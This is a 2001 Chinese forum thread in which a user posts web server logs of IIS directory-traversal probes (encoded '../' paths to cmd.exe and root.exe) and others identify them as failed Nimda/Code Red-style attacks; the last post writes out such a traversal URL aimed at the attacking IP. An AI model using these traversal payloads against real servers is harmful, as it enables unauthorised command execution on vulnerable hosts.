PDA

最近是不是有新版的紅色警戒,請看我的LOG



贊助商連結

ba88ms21
2001-09-19, 02:59 PM
61.216.24.46 - - [19/Sep/2001:14:54:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.24.46 - - [19/Sep/2001:14:54:36 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.140.33 - - [19/Sep/2001:14:54:37 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.140.33 - - [19/Sep/2001:14:55:00 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.140.33 - - [19/Sep/2001:14:55:06 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.140.33 - - [19/Sep/2001:14:55:11 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.140.33 - - [19/Sep/2001:14:55:23 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.24.46 - - [19/Sep/2001:14:55:24 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.24.46 - - [19/Sep/2001:14:55:49 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.14.22 - - [19/Sep/2001:14:55:53 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.14.22 - - [19/Sep/2001:14:55:55 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.36.174 - - [19/Sep/2001:14:57:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.36.174 - - [19/Sep/2001:14:57:47 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:57:48 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:57:50 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:57:52 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:58:18 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:58:22 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
61.216.36.174 - - [19/Sep/2001:14:58:25 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:28 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:32 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.36.174 - - [19/Sep/2001:14:58:38 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
61.216.186.37 - - [19/Sep/2001:14:58:43 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
61.216.186.37 - - [19/Sep/2001:14:58:45 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
61.216.186.37 - - [19/Sep/2001:14:58:51 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:58:51 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.186.37 - - [19/Sep/2001:14:58:53 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
61.216.36.174 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
61.216.186.37 - - [19/Sep/2001:14:58:58 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.36.174 - - [19/Sep/2001:14:59:01 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.186.37 - - [19/Sep/2001:14:59:04 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.36.174 - - [19/Sep/2001:14:59:08 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
61.216.186.37 - - [19/Sep/2001:14:59:09 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
61.216.186.37 - - [19/Sep/2001:14:59:11 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
61.216.92.80 - - [19/Sep/2001:14:59:13 +0800] "GET /cy/newimage.js HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/style.css HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/await.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/themes/Green/logo.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:14 +0800] "GET /cy/images/pix.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/sun.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/index.php HTTP/1.1" 200 30261
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/print.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/friend.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/news.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/topics/compaq.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/vote.gif HTTP/1.1" 304 -
61.216.92.80 - - [19/Sep/2001:14:59:15 +0800] "GET /cy/images/menu/traditionalchinese/result.gif HTTP/1.1" 304 -
61.216.186.37 - - [19/Sep/2001:14:59:16 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302

贊助商連結

Ares
2001-09-19, 04:18 PM
若沒猜錯的話....
你是用NT4.0 OR WIN2000吧.
你有用IIS架WEB Server嗎?
若沒有拜託移除吧~~~~~~~~~~~~~~
有人跑到你的c槽去了.....
在網路上隨便找就有一堆有裝IIS卻毫無防備的PC.....
就連駭客功力連初級都稱不上的人(像是我)都可以入侵.
真是搞不懂為什麼有這麼多個人用戶不架Web還裝2000 server,像我裝perfessional不就很好嗎~~~
ba88ms21
2001-09-19, 04:29 PM
不是,我是用apache for win32的,請問這是什麼情況呀
maxtk
2001-09-19, 04:57 PM
最初由 Ares
若沒猜錯的話....
你是用NT4.0 OR WIN2000吧.
你有用IIS架WEB Server嗎?
若沒有拜託移除吧~~~~~~~~~~~~~~
有人跑到你的c槽去了.....
在網路上隨便找就有一堆有裝IIS卻毫無防備的PC.....
就連駭客功力連初級都稱不上的人(像是我)都可以入侵.
真是搞不懂為什麼有這麼多個人用戶不架Web還裝2000 server,像我裝perfessional不就很好嗎~~~

有切到C槽嗎? 看清楚一點吧..一堆404....-.-
signally
2001-09-19, 05:15 PM
這不是RedCode吧
紅色警戒是始用緩衝區溢位來入侵
你的情形是被人家以Unicode裡的
CGI 編碼錯誤來入侵
deepblue
2001-09-19, 05:24 PM
或許這是BLUECODE 或 NIMDA
這兩個新病毒可說是紅色警戒的下一代
就像蟑螂一樣
愈來愈強
Ares
2001-09-19, 05:41 PM
抱歉ㄚ,了解了.若你的server是用apache for win32,這些log看來是嚐試走IIS的scripts漏洞但沒入侵成功,雖然沒入侵成但是多少會影響頻寬.
這可能是NIMDA病毒,因為今天此病毒已全面擴散,跟CodeRed影響力差不多.
bgbg
2001-09-19, 10:28 PM
最初由 Ares
抱歉ㄚ,了解了.若你的server是用apache for win32,這些log看來是嚐試走IIS的scripts漏洞但沒入侵成功,雖然沒入侵成但是多少會影響頻寬.
這可能是NIMDA病毒,因為今天此病毒已全面擴散,跟CodeRed影響力差不多.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

請問高手们:
      上述是沒入侵成功、那如果未修正漏洞的主機是不在瀏覽器打入:D http://61.216.36.174/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir:D 時就會直接看到該主機的所有目錄了ㄋ:confused: 請求個位高手解答,謝謝。